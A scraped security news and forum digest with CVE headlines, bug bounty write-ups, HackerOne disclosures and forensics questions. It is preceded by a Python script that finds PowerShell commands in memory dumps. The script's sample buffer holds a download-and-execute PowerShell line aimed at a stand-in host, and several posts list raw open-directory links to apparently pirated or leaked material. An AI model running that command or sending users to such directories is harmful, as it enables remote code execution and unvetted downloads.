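An added example for the Volatility question, not part of the post. cmdscan walks conhost's command-history structures, which are filled by programs that read input through the console's line editor; PSReadLine takes keystrokes itself, so typed PowerShell lines rarely appear there (consoles may still show the screen buffer). The two places to look instead are the on-disk history %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, recoverable from the image with filescan/dumpfiles if it is cached, and the powershell.exe process memory, where typed lines survive as UTF-16LE .NET strings. `strings -e l` over the memdump output gets most of the way; the script below does the same in Python and filters for Verb-Noun cmdlet names, run over a constructed buffer that stands in for the process dump. The sample bytes and the keyword filter are assumptions.

```python
import re

def utf16le_strings(blob, min_len=6):
    """Yield (offset, text) for runs of >= min_len printable ASCII characters
    encoded as UTF-16LE, the form .NET (and so PowerShell) keeps strings in."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in pattern.finditer(blob):
        yield m.start(), m.group().decode("utf-16-le")

# Verb-Noun cmdlet shape (Get-ChildItem, New-Object, Invoke-WebRequest ...).
CMDLET = re.compile(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b")

def powershell_candidates(blob, min_len=6):
    """UTF-16LE strings that look like PowerShell input: a cmdlet name or the
    word 'powershell'. The offset lets a hit be tied back to a VAD or page."""
    return [(off, s) for off, s in utf16le_strings(blob, min_len)
            if CMDLET.search(s) or "powershell" in s.lower()]

# Constructed stand-in for a powershell.exe memdump: two typed commands, a
# benign .NET string, 8-bit noise and binary filler.
SAMPLE_DUMP = (
    b"\x00" * 8
    + "Get-ChildItem C:\\Users\\bob\\Desktop".encode("utf-16-le") + b"\x00\x00"
    + b"plain 8-bit noise that is not a .NET string"
    + "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')".encode("utf-16-le")
    + b"\x00\x00"
    + "Hello World from Notepad".encode("utf-16-le") + b"\x00\x00"
    + bytes(range(256))
)

if __name__ == "__main__":
    for off, s in powershell_candidates(SAMPLE_DUMP):
        print(f"0x{off:08x} {s}")
```

On a real dump expect thousands of hits from loaded modules and help text; sorting by offset and reading around each cluster of cmdlet strings, or adding the session's known prompt text to the filter, separates typed input from library strings.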
  • Open

    OSINT TOOLS 2022 (Part 2)
    Browser extensions for OSINT Continue reading on Medium »
    Digital Forensics on Fitness Trackers
    There are many fitness trackers on the market today such as the Fit Bit that will monitor your health in various ways. These devices… Continue reading on Medium »
    osint metasearch engine list free
    Hi everyone! Continue reading on Medium »
    OSINT Terminal User Interface
    Open Source Intelligence Terminal User Interface. OSINT from your favorite services in a friendly terminal user interface, written in Rust Continue reading on Medium »
  • Open

    CVE-2007-4559 Patch
    Article URL: https://github.com/search?type=Issues&s=created&o=desc&q=is%3Apr+author%3ATrellixVulnTeam Comments URL: https://news.ycombinator.com/item?id=33237352 Points: 2 # Comments: 0
  • Open

    Linux Privilege Escalation: Linux kernel / distribution exploits you should know about.
    No content preview
    $6000 from Microsoft, WAF Bypass, Manual Exploitation, Nuclei Guide, Admin Panel and much…
    No content preview
    Conducting a free AWS Security Assessment with Prowler
    Get a complete AWS security report with this free tool Continue reading on InfoSec Write-ups »
    SSH: Introduction, How to Secure and Working
    No content preview
    CVE-2022-41040: ProxyNotShell Exchange Vulnerability
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x1
    No content preview
    How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags
    No content preview
  • Open

    SecWiki News 2022-10-17 Review
    The hidden danger in the Response: uncovering the weak points that exist in HTTP responses by 蓝色淡风; SecWiki Weekly (Issue 450) by 路人甲; Notes on reproducing the latest Cobalt Strike RCE (CVE-2022-39197) by ourren; [HTB] Nunchucks Writeup by 0x584a; Combined static and dynamic analysis of a non-standard MD5 algorithm and its recovery by ourren; For more of the latest articles, visit SecWiki
  • Open

    Small link...
    Few films, music etc... good tunes... Link... NSFW only because of the swimwear vid & not been through it all... submitted by /u/xanderTgreat [link] [comments]
    Tons of popular and spanish/mexican music
    http://167.114.174.132:9092/music/ submitted by /u/Shitemoji69 [link] [comments]
  • Open

    How I Hacked my Crush’s school !
    How I got access to my Crush’s School’s Website’s Admin panel Continue reading on Medium »
    Facebook SMS Captcha Was Vulnerable to CSRF Attack
    This post is about a bug that I found on Meta (aka Facebook) which allows making any endpoint a POST request in the SMS Captcha flow which… Continue reading on Medium »
    A $500+ Open Redirect Bounty in Under 10 Minutes
    This post is a quick guide on how to utilize the Open Redirect bug on any sites you test, including a real-world step-by-step. Continue reading on Medium »
  • Open

    A journey of fuzzing Nvidia graphic driver leading to LPE exploitation
    submitted by /u/jeandrew [link] [comments]
    Toner Deaf – Printing your next persistence (Hexacon 2022)
    submitted by /u/digicat [link] [comments]
  • Open

    Detecting Emerging Network Threats From Newly Observed Domains
    We discuss how to discover potential threats among newly observed domains at the time they begin to carry attack traffic. The post Detecting Emerging Network Threats From Newly Observed Domains appeared first on Unit 42.
  • Open

    FreeBuf Morning Report | Multiple Korean online platforms go down and the president apologises; some iPhone 14 units hit by a "SIM not supported" problem
    A fire broke out on the 15th at SK C&C's Pangyo data centre in South Korea, disrupting multiple online platforms including Kakao Talk, Korea's "national messaging app".
    ByteDance is hiring | Senior security engineer and technical expert positions await your application!
    Colleagues with experience in privacy compliance security, data security, client/mobile security and QA are welcome!
    Cryptocurrency platform Mango Markets loses over $100 million in an attack; hacker announces return of $67 million
    A hacker claiming responsibility for the attack said they would return part of the stolen funds, about $67 million, and keep the remainder as a nominal bug bounty.
    Student sentenced to 13 months in prison for stealing information and downloading nude photos
    US District Judge Silvia Carreño Coll sentenced Iván Santell-Velázquez to 13 months in prison for cyberstalking.
  • Open

    OSINT Terminal User Interface
    Open Source Intelligence Terminal User Interface. OSINT from your favorite services in a friendly terminal user interface, written in Rust.
    Primer on Active Directory for OSCP/OSEP/CRTP/CRTE
    Hey Squad,

    OTP bypass in verifying NIN
    MTN Group disclosed a bug submitted by mr_sparrow: https://hackerone.com/reports/1314172

    Analysis of an Android NFC race condition vulnerability (CVE-2021-0870)
    Author: 墨云科技 VLab Team. Original link: https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw. Overview: NFC plays an important role in people's daily lives and has become an indispensable component of mobile devices. Like Bluetooth, NFC uses radio-frequency technology to communicate between devices, so both the chip firmware and the host NFC subsystem are targets for remote code execution (RCE) attacks. CVE-2021-0870 is an NFC...
    8220 Gang cloud botnet infects about 30,000 hosts worldwide
    Author: Tom Hegel. Translator: Knownsec 404 Lab translation team. Original link: https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/. In July 2022 we reported on 8220 Gang, one of the many low-skill crimeware groups we have observed, which infects hosts through known vulnerabilities and remote-access brute forcing...

    My selection of YouTube channels for Hacking and Bug Bounty
    Years ago, I learned lots of hacking techniques by practicing exercises in Pentester Lab that were well-described and practical. This time…
    My First Critical Bug In HackerOne Platform
    Hello Everyone
    How I Got $10,000 From GitHub For Bypassing Filtration of HTML tags
    Hey everyone👋, I hope you’re having an A+ week🚀! In today’s blog, I am going to tell you “How I Got $10,000 From GitHub”.
    HTTP request smuggling Explained and Exploited Part 0x1
    Hi! My name is Hashar Mujahid and today we will sneak a peek into Request Smuggling vulnerabilities.
    My fav 7 methods for Bypassing Android Root detection
    Hola H3ck3rs,
    SQL Injection for Beginners using sqlmap, Part 2
    Hello friends, I’m Rajneesh Kumar Arya, back again with my new blog on SQL Injection.
    How to Install RustScan in Kali Linux
    The fastest port scanner
    Linux Privilege Escalation Part 1
    After we gain an initial foothold on the machine, the next step is to escalate privileges on that machine. So in this writeup, we will…

    Introduction to OSINT: tools and techniques
    Those who read my Medium blog already know about my passion for OSINT and financial crimes. So in today's post, I will give you a brief…
    SPY NEWS: 2022 — Week 41
    Summary of the espionage-related news stories for Week 41 (October 9–15) of 2022.

    Movies, Series, Anime in Spanish/Portuguese (ES,PT)
    http://190.108.85.179/ http://51.81.208.167/ http://89.41.180.242/ http://51.68.152.161/ http://104.225.235.61:8080/ http://80.29.87.59:8888/ http://144.217.180.205/ http://45.179.164.59:8181/ http://207.180.214.233/ https://170.254.244.15:9999/ http://142.4.219.127/ http://ns5000797.ip-142-4-219.net/ http://216.244.76.122/ submitted by /u/SubliminalPoet
    Various Music (Rock, Techno, Jazz, World, Relaxation, ...)
    https://178.168.80.19/music/ http://83.212.115.216/ (electro/techno) https://90.164.127.216/Music/ (rock) https://212.159.121.149:2083/ (radio records) https://74.91.116.249/music/ https://46.252.16.77/music/ http://84.16.67.29:8080/ http://90.179.79.175/music/ http://193.77.232.76:8080/Music/Digital/ https://82.3.101.179/Music/ https://144.217.14.38/music/ http://73.253.211.145:8800/Music/ http://147.189.170.225/music/ http://10g02.netbroadcasting.tv/ http://home.darkok.xyz/Music/ https://music.drlazor.be/ http://bvovlive.edge.netbroadcasting.tv/ http://dl.smusic.ir/ submitted by /u/SubliminalPoet
    A large collection of stencil art images
    submitted by /u/SubliminalPoet
    A ton of e-books: https://avalonlibrary.net/ebooks/
    submitted by /u/Zizou70

    Is my path correct for entry level SOC analyst role?
    Hi, my main goal at this point is to find a remote entry level SOC analyst role or similar. The important thing for me would be that it must be related to infosec and remote.

    Things I've been doing:
    - Grinding TryHackMe (my profile) and completing rooms, learning paths
    - Reverse engineering an Android app with a private API and writing a public Kotlin library for it
    - Reading a lot about recent CVEs, write-ups, mitigation techniques

    Things I know: pretty much anything related to 'the job' (SIEMs, OWASP ZAP, Burp Suite, Linux, Wireshark, Active Directory, reverse engineering binaries, APKs etc., git, web vulnerabilities... etc.). Also, I know (by knowing I mean I developed some things with it and posted on GitHub): JavaScript, Python, Bash and Kotlin (my GitHub profile). Daily driving Linux for more than 5 years (Arch). I'm currently in the 3rd year of both a Computer Science degree and a Management Information Systems degree, and I feel like I couldn't get the job even if I applied to it. So my plan is to keep grinding TryHackMe until I'm around 1k ranking or below (currently 3.5k as you can see from my THM profile), and currently after I solve CTFs I submit a write-up to my Medium profile. In my mind, these should ease the process, hence why I'm doing it.

    My questions to anyone who read so far are:
    - Is my current path correct (grind THM before applying for jobs until I'm 1k or below, submit write-ups to Medium after completing CTFs)?
    - What is your general advice?

    Thanks submitted by /u/otuva

    Regulator: A unique method of subdomain enumeration
    submitted by /u/Quick-Ingenuity-7024

    Virtual memory retrieval?
    If a computer is using virtual memory and power is lost, is the information that had been in the virtual memory retrievable since it could be using magnetic disk even though the information in RAM is lost? submitted by /u/FatumIustumStultorum

    Megaman zero

    SecWiki News 2022-10-16 Review
    A missing lesson in computer education by ourren. For more of the latest articles, visit SecWiki.

    Enterprise security building: application security
    A full-system sharing on enterprise security building.
    Sangfor East China Team: Enterprise secure browser attacks and defenses
    Today, cybercriminals are always inventing new ways to trick users in order to obtain their credentials, keys, and any other valuable information.
    AD-Resolute explained in detail
    Resolute, a domain penetration machine from Hack The Box's Active Directory 101 series.
    Malicious bots have appeared on your API! How to defeat API bot attacks?
    How do you protect APIs from bot intrusion and attack? The following introduces effective methods for API bot detection and protection.
    VulnHub Ripper
    Topics covered: host scanning, port and service probing, sensitive directory collection, web information gathering, file leakage, Linux local privilege escalation, etc.
    Multi-factor authentication (MFA) fatigue attacks are on the rise: how to defend against them
    For a long time, credential leakage has been one of the main causes of network intrusions.
    How does Wine implement a Windows cross-platform compatibility layer?
    If you find that I am completely misleading people, please lend a hand and correct me!

    Evil Twin with Karma Attack in Enterprise WiFi Network
    submitted by /u/tbhaxor

    Simple account takeover
    I wanted to share a simple account takeover technique and the common pattern I found when it was available. Now there aren’t that many…
    CVE-2020–13956
    Motivation
    Practical Guide to Malware Analysis and Reverse Engineering (Analyzing VBA “Macros” Code, Part 2.2)
    Manually Analyzing VBA “Macros” Code, Part 2.2
    How to get more accurate results with Google
    Google is used by almost everyone in today’s digital world for one thing or another. Be it to learn or just to surf the internet, Google plays…

    Cloudgoat AWS CTF solution: Scenario 4 (cloud_breach_s3)
    Scenario: cloud_breach_s3
    Red Team C2 Log Visualization
    RedEye is a visual analytic tool supporting Red & Blue Team operations.

    Docs from "AUTONOMOUS NON-PROFIT EDUCATIONAL ORGANIZATION HIGHER EDUCATION "CRIMEAN INSTITUTE OF BUSINESS" in Russian
    https://drive.google.com/drive/folders/1Vi8kR4AwGb5Vk8IZntZ9Z1S5pgRMKnDh submitted by /u/dudewithoneleg
    [NSFW] ROMs, eBooks, Software, Games
    https://aidymatic.co.uk/apps/ - Emulators for Android, ROMs (N64, PCE, SNES, GENESIS), and gameplay videos http://privat.bahnhof.se/wb220832/ - Various game mods http://45.32.33.124/ - Programming ebooks http://178.213.152.72/ - eBooks (Various languages) https://crashrecovery.org/woolfolk/ - eBooks (Religious, propaganda, etc) http://45.76.45.44/ - eBooks, Software, Videos of science experiments (1.mp4 that face lmao) https://infopirate.xyz/ - Tech eBooks https://dev.host/~shmup/ - eBooks, random TV Shows, ROMs, Feet Videos (NSFW?) https://www.kidssearch.com/ColoringPages/ - Pages for coloring (shocking I know) http://164.115.43.80/eBooks/ - eBooks & Courses http://www4.hcmut.edu.vn/~honhuynh/ - Windows Software http://103.203.93.5/ - Windows Software, PC Games, OS ISOs http://www.miyako.pro/files/ - Windows Software, Games, Music, Manga (NSFW) submitted by /u/JasonSec

    Rfparty - a new way to see BLE
    submitted by /u/sevenbitbyte
    Volatility 3 vs 2 for Linux memory forensics
    Hi experts, so far I have been using Volatility 2 for Linux forensics, but I was wondering whether anyone here has tried both 3 and 2 for Linux forensics? Is there any benefit for me to switch to Volatility 3, primarily for Linux forensics? Tried reading the docs here: https://readthedocs.org/projects/volatility3/downloads/pdf/latest/ but got confused with all the symbol table stuff, so is there any real benefit for me to switch to 3? Do Linux forensic experts still use 2 or are they switching to 3? My problem with Volatility 2 is the requirement for me to build a different profile for every god damn custom kernel out there, which becomes a headache, not to mention the target machine not having the required packages for me to do a make. So are these improved in Volatility 3? submitted by /u/Ro0o0otkit
    Forensic Images for Class Work?
    Hi folks, I am sure we have some instructors in this subreddit. How do you recommend making problem "images" for students to work on? Specifically keeping the size down, appearing as a Windows PC, and including files in unallocated space. I was thinking a logical image just pulling in what I needed, but in FTK Imager that creates the AD1 format, which might not work for me in other tools. Any ideas? Thanks. submitted by /u/Peardog_PA
    Majoring Question
    Hi everyone, I'm currently completing my A.A. degree and plan on a career in computer/digital forensics and analysis. What are your opinions on pursuing a major in Forensics (B.S.) with a minor in computer science? That's what I'm planning on doing, and after that I plan on pursuing a master's in Cybercrime if needed. Ofc I'll be completing certifications and learning relevant skills on the side. submitted by /u/Purple_Nesquik

    Steganography #1: Creating a digital microdot
    I recently came across a Tweet from Hexadecim8 explaining how to make microdots using photographic film. This steganography technique was…
    Payatu Hiring CTF 2022
    Network 1,2 Writeu
    OSINT
    OSINT (Open Source Intelligence)

    Which chapters of Network Security Assessment and RTFM are recommended for the CPSA?
    I am taking the CREST CPSA exam in the near future and want to revise for it as effectively as possible. I've read a bunch of posts and blogs about it and done some revision on port numbers and HTTP codes, but I would like to read these 2 as many people seem to suggest that they will be the most helpful. I've had a look at them and there are about 700 pages between the two of them, which would take months for me to read if I'm being honest. So I was wondering if anyone has any tips here or can outline chapters that will be the most useful to me so I can target my efforts. submitted by /u/kylomorales
    TCP packet out of state
    Hi. We've observed traffic being dropped on the firewall due to "tcp packet out of state". Do you guys happen to know what this means? Below is what can be seen in the firewall log. Thanks in advance. Tcp packet out of state : First packet isn't SYN TCP Flags : ACK submitted by /u/lostandconfuseddt

    SecWiki News 2022-10-15 Review
    Feature embedding modeling for the ranking stage of recommender systems by ourren. For more of the latest articles, visit SecWiki.

    Crash Linux systems over the air (CVE-2022-42722 POC on an ESP32)
    Article URL: https://github.com/jo-m/linux-wifi-ota-crash Comments URL: https://news.ycombinator.com/item?id=33215265 Points: 24 # Comments: 1
    CVE-2022-42889 Apache Commons Text
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-42889 Comments URL: https://news.ycombinator.com/item?id=33211721 Points: 1 # Comments: 0

    Have you checked these 45 account security risks?
    This article lays out 45 account security risk points to help everyone find and fill gaps in account security management and build a more comprehensive account security system.
    A brief analysis of Valve memory shells in the Tomcat architecture (Memory Shell Series, Part 11)
    The eleventh article in the memory shell series: implementing a Tomcat Valve memory shell.

    Write-up: Infinite money logic flaw @ PortSwigger Academy

    Events Ripper
    Not long ago, I made a brief mention of Events Ripper, a proof-of-concept tool I wrote to quickly provide situational awareness and pivot points for analysts who were already on the road to developing a timeline. The idea behind the tool is that artifacts are compound objects and have value based not just on their time stamps; their value can also be predicated on the analysis questions or goals, or just the nature of their path, or some other factor. The tool leverages the fact that analysts are already creating timelines, and uses the intermediate events file format to develop situational awareness and pivot points to facilitate analysis. Many times, we're looking through a timeline for some root cause or predicating event, but we're dealing with the fact that there was some normal sys…

    How a Microsoft blunder opened millions of PCs to potent malware attacks
    submitted by /u/0xdea

    Recommended high speed port scanner?
    Should I use Spoonmap/DivideAndScan/RustScan and send the open ports to nmap for detailed scanning? Spoonmap https://github.com/trustedsec/spoonmap RustScan https://github.com/RustScan/RustScan DivideAndScan https://github.com/snovvcrash/DivideAndScan What are you pros doing? submitted by /u/EquityMSP

    Alerting for Password Management Solution
    Hi AskNetSec, we've recently onboarded 1Password as our password manager. Due to what happened with Uber recently, where an actor was able to compromise their password manager, which allowed them to access everything and anything. I understand that we should use Role Based Access Control (RBAC), Multi Factor Authentication (MFA), GeoIP restrictions for example. However, we collect our event logs from 1Password and we ingest them into Datadog's Cloud SIEM. I've added an alarm to trigger if a user starts looking at many items. I wanted to ask what you would alert on if you had these activity logs. https://support.1password.com/events-reporting/ submitted by /u/CyberStagist
    Is there a way to test Microsoft Authenticator MFA push notifications for all users?
    I believe Duo might have had a function where you could send a fake push notification to all users and see who clicks "Approve". Is there a similar method of doing this in a Microsoft environment with Microsoft Authenticator? Some Googling has not returned anything useful. Perhaps there is a pentesting tool that can do this? submitted by /u/dron3fool
    Wanna get into Cybersecurity and don't know where to start
    As the title states, I wanna get into cyber security. I'm not sure what route I should take in order to start learning: should I apply to an official company and pay for schooling, or do I just take the DIY route, using Skillshare, YouTube, free websites, etc.? I have a pretty fair amount of experience using Python, I have mild experience using the CMD prompt on Windows computers, and I have always been comfortable easily removing any viruses or malware from my computers throughout my life, so I feel like the learning curve for getting into cybersec won't be too shallow. I just need advice on where to shove my foot in the door. Any advice would be greatly appreciated, thank you. submitted by /u/mrmclovinnn

    Zlib Critical Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-37434 Comments URL: https://news.ycombinator.com/item?id=33209096 Points: 19 # Comments: 1
    Windows CryptoAPI Spoofing Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689 Comments URL: https://news.ycombinator.com/item?id=33198603 Points: 2 # Comments: 0

    CrowSec EdTech Write-up: Cockpit
    This challenge was really good; I learned about NoSQL injection, manual manipulation of the API, and privilege escalation with crontab…
    RED Team, BLUE Team, PURPLE Team, Ethical Hacking and their differences
    The cybersecurity landscape is constantly evolving, and with it, the terminology used to describe various aspects of the…
    Cloudgoat AWS CTF solution: Scenario 1 (vulnerable_lambda)
    Scenario 1: vulnerable_lambda
    How Red Teaming Could Help with Management
    While red teams have been around since as early as the 19th century, they became popular in the United States military especially after 2003…
    Red Team Assessment Service In Singapore
    Highly Knowledge-Based Red Team Assessment Service In Singapore

    Surfer TryHackMe walkthrough
    Introduction
    Security is not in your fingerprint.
    How I bypassed biometric security using Flipper Zero

    CVE-2022–41542 Session Mis-Configuration in Devhub Application
    Session misconfiguration is a widely popular vulnerability.
    CVE-2022–33077: IDOR to change address of any customer via parameter pollution in nopCommerce <= 4.5
    TL;DR: A POST request to the edit address endpoint involved two addressID parameters (one in the URL and the other in the request body)…
    Top 10 Best Bug Bounty Tools in 2022
    In today’s world, cybersecurity holds top priority for most organizations and governments. Large companies are investing millions of…
    Story about Escalation of HTML Injection to EC2 Instance credentials leak
    Hello all, thanks for the overwhelming response; here I am with my new finding tale.
    My Learning Methodology for Web Security
    Hello, to give something back to the infosec community I decided to start a new series on web application pen-testing. And this would be…
    PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under?
    A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS…
    Google SSO misconfiguration leading to Account Takeover
    I’m a technical guy. However, this post doesn’t contain any technical details, but that’s because this bug doesn’t require any. I need to…

    Host Header Injection on https:////Account/ForgotPassword
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1679969
    Unauthenticated SQL Injection at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1626226 - Bounty: $1000
    .git folder exposed [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1624157
    Unauthenticated PII leak on verified/requested to be verified profiles on /app/org/{id}/profile/{id}/version/{id} [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by shreky: https://hackerone.com/reports/1627962
    Authentication bypass leads to Information Disclosure at U.S Air Force "https://"
    U.S. Dept Of Defense disclosed a bug submitted by ludv1k: https://hackerone.com/reports/1690548
    SSRF to read AWS metaData at https:/// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by 720922: https://hackerone.com/reports/1624140 - Bounty: $1000
    Subdomain Takeover at http://.get8x8.com/
    8x8 disclosed a bug submitted by testingforbugs: https://hackerone.com/reports/1697402
    Found Origin IP's Lead To Access
    U.S. Dept Of Defense disclosed a bug submitted by ibrahim0936356: https://hackerone.com/reports/1556808
    Broken access discloses users and PII at https:// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by g4mb4: https://hackerone.com/reports/1624374
    Local file read at https:/// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1626210 - Bounty: $1000
    [hta3] Chain of ESI Injection & Reflected XSS leading to Account Takeover on []
    U.S. Dept Of Defense disclosed a bug submitted by jr0ch17: https://hackerone.com/reports/1073780 - Bounty: $750
    [HTA2] Receiving access request on @wearehackerone.com email address
    U.S. Dept Of Defense disclosed a bug submitted by jr0ch17: https://hackerone.com/reports/715740 - Bounty: $750
    Blind SSRF via image upload URL downloader on https:///
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1691501
    Account Takeover and Information update due to cross site request forgery via POST /registration/my-account.cfm
    U.S. Dept Of Defense disclosed a bug submitted by snifyak: https://hackerone.com/reports/1626356
    IDOR leaking PII data via VendorId parameter
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1690044
    Account takeover on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by nightm4re: https://hackerone.com/reports/1627961 - Bounty: $500

    [PDF] Security Deep-Dive Into The Internals Of NetBackup - AirbusSecLab@Hexacon
    submitted by /u/alain_proviste
    Microsoft Office 365 Message Encryption Insecure Mode of Operation
    submitted by /u/kekw32
    Exploiting predictable UUID/GUID values
    submitted by /u/dcthatch
    Adobe Reader - XFA - ANSI-Unicode Confusion Information Leak
    submitted by /u/hacksysteam
    FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684) + PoC
    submitted by /u/mrkoot

    SecWiki News 2022-10-14 Review
    Entity and relation extraction from speech data by ourren; IM phishing defense scheme by ourren; Threat intelligence: what matters and what doesn't by ourren. For more of the latest articles, visit SecWiki.

    NSFW................WtF
    Ok, don't click on tampon... https://bu64.myds.me:8081/Private/ Would say this is not hetero tastes... submitted by /u/xanderTgreat
    Looks like Documentaries
    Slow site, best rip & watch later... https://ftphost.nohum.net/video/ (noun, plural noun: documentaries. A movie or a television or radio program that provides a factual record or report)... submitted by /u/xanderTgreat

    Presentation of OSINT Material & Challenge
    Assignment 7
    The Castle’s Latrine
    Your keep is my keep. A story from when I worked for a previous employer.
    From infobesity to infopulence
    For some years now, people have readily spoken of infobesity to describe the (too) large amount of information available, notably thanks…

    CVE-2022-42889: RCE in Apache Commons Text prior to 1.10.0
    Article URL: https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om Comments URL: https://news.ycombinator.com/item?id=33204788 Points: 1 # Comments: 0

    (Linux forensics - Volatility Profile Creation) - Solution for when "make" is not available on the target with a custom Linux kernel, and there is no internet connection?
    Let's say you have captured a memory dump on the target Linux machine using AVML, and now you want to create a Volatility profile, which requires make to be present on the machine. But you have a target machine that has a custom kernel, and there is no internet connection because of a restrictive environment, and they won't give you their kernel code so you can build it in a VM and create a profile there, due to security reasons, which is understandable. What are the solutions in this situation other than jumping out the window? How can I create the Volatility profile without using make? submitted by /u/Ro0o0otkit

    Ransom Cartel Ransomware: A Possible Connection With REvil
    Ransom Cartel is ransomware as a service (RaaS) that exhibits several similarities to and technical overlaps with REvil ransomware. Read our overview. The post Ransom Cartel Ransomware: A Possible Connection With REvil appeared first on Unit 42.

    Threat Hunting Series: Using Threat Emulation for Threat Hunting
    Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
    Exploit Eternal Blue (MS17–010) for Windows 7 and higher (custom payload)

    FreeBuf Morning Report | PoC for the Fortinet authentication vulnerability has been released; 0patch takes over from Microsoft to provide service for Windows 7
    Proof-of-concept (PoC) exploit code is now available for the recently disclosed critical security vulnerability affecting Fortinet, so users must act quickly to apply the patch.
    FreeBuf Weekly | A VMware vulnerability remains unpatched after a year; vulnerabilities found in IKEA's smart lighting system
    We have summarized and recommended this week's hot news, security incidents, good reads of the week, and handy tools, to make sure you don't miss any of this week's highlights!
    Magniber ransomware infects Windows users via JavaScript files
    Note: before restoring data, users should make sure their backups are not infected.
    Sangfor East China Team: Windows computer forensics [Part 1]
    Computer forensics is an important area of cyber offense and defense, involving the collection of evidence of activities performed on a computer.
    MySQL MLPS 2.0 (等保2.0) assessment
    MLPS 2.0 (等保2.0) assessment of the MySQL database.
    How to do hybrid cloud security | FreeBuf in-house security (甲方) group topic discussion
    How can enterprises deploying hybrid cloud ensure security while balancing efficient management and cost control?
    SAST + SCA: a security upgrade when used together
    According to SAP, 85% of security attacks today target software applications, so a series of application security testing tools have emerged.

    What are the best certifications to get a job in the Pen Test field?
    I was curious about which certifications are valuable in the eyes of a company that's hiring a junior pen tester? Thank you. submitted by /u/Snoo_11846

    Pre requisite skills for exploit dev
    Hi everyone, hopefully this question is appropriate for this sub. If not, I'll happily delete. I'm really interested in exploit development, have done basic buffer overflows without any protections etc. But I'm kind of feeling like I won't ever be at the point where I know enough about programming to actually be successful in exploit dev. My main question here is basically: how good do I have to be at programming before I'm able to achieve any kind of success (not monetary, just finding bugs in real targets for fun etc.)? I've done a basic amount of C (Caleb Curry's course if anyone's familiar) and some introductory ASM. I'm obviously going to keep learning as much as I can, but feel like I won't be able to learn enough about systems plus learn how to exploit things at a high level. Do most people who do exploit dev come from backgrounds where they're writing OSes and apps in C, or did you kind of just pick those things up as you learnt? Any advice would be awesome. Thanks :) submitted by /u/NoNameN3d

    [NSFW] Movies, TV Shows, Music, Software, eBooks, IPTV, Flash Games
    http://5.77.63.75/ - NSFW Siterips http://www.rnc3.net/media/ - Music https://www.mamalisa.com/mp3/ - Family Rhymes & Singalongs https://tworedcrayons.com/songs/ - Music http://pebbles99.com/ - Music http://www.floodkingz.org/ - eBooks (Survival, Coding, Security, Electronics, etc.) http://freebooks.lescigales.org/ - French eBooks (Romance) (NSFW I guess?) https://public-archive.org/ - Documents from past hacks/leaks (HackingTeam, FinFisher, etc.) http://eletrica.ufpr.br/graduacao/e-books/ - eBooks (Electrical Engineering) http://mtbplusiptv.com/ - IPTV M3U's (ESPN or a good PPV anyone?) https://www.igre24.net/games/ - Flash games http://mochipl.datatask.net/ - Flash games https://www.newmusicserver.com/songs/ - Music (a TON of music all genres) http://www.betezda.com/songs/ -…
    [NSFW] Music, sound effects, skin suit things
    http://78.203.242.230 => Sound effects, music https://82.65.97.128 => skin suits things, body/skin suit hentai/mangas, various triaged and untriaged videos http://82.66.65.53 => Music submitted by /u/MasterIO02

    My journey with rate limit bypasses
    How do I bypass rate limits? Continue reading on Medium »
    Public Bug Bounty and Vulnerability Disclosure programs with less competition.
    1. Open Bug Bounty Community Continue reading on Medium »
    Initial word
    I love anything related to cyber security stuff especially red teaming, exploit/malware development. By day I learn new technologies in… Continue reading on Medium »
    The story of a [P5] that lead me to a [P3] find
    Helloo, Continue reading on Medium »
    SQL Injection in GraphQL
    Hello friends I’m Ahmed Gad This Is First Write-Up I Hope you like It Continue reading on Medium »
    Fall account takeover via Amazon Cognito misconfiguration
    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    OSCP : Complete Guide Part-1
    Hi everyone, so I’m sharing some resources & tools information which will be helpful in your OSCP journey. If you have a career in… Continue reading on System Weakness »
    AWS S3 bucket Misconfigurations and Exploitations
    — — — — — — — — — - AWS S3 bucket Misconfigurations — — — —— — Continue reading on Medium »
    Code flaws leads to Org/Admin Account Takeover
    Hello Everyone, I’m Saransh Saraf and I’m back with another unique account takeover idea, so let’s just dive into it :) Continue reading on Medium »

    Self XSS in https://linkpop.com/dashboard/admin
    Shopify disclosed a bug submitted by hazemhussien99: https://hackerone.com/reports/1591403 - Bounty: $500
    Staff can create workflows in Shopify Admin without apps permission
    Shopify disclosed a bug submitted by jmp_35p: https://hackerone.com/reports/1521336 - Bounty: $1600
    XSS seems to work again after change to linkpop at https://linkpop.com/testnaglinagli
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1569940 - Bounty: $1600
    Cross-site scripting on api.collabs.shopify.com
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1672459 - Bounty: $1600
    mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040
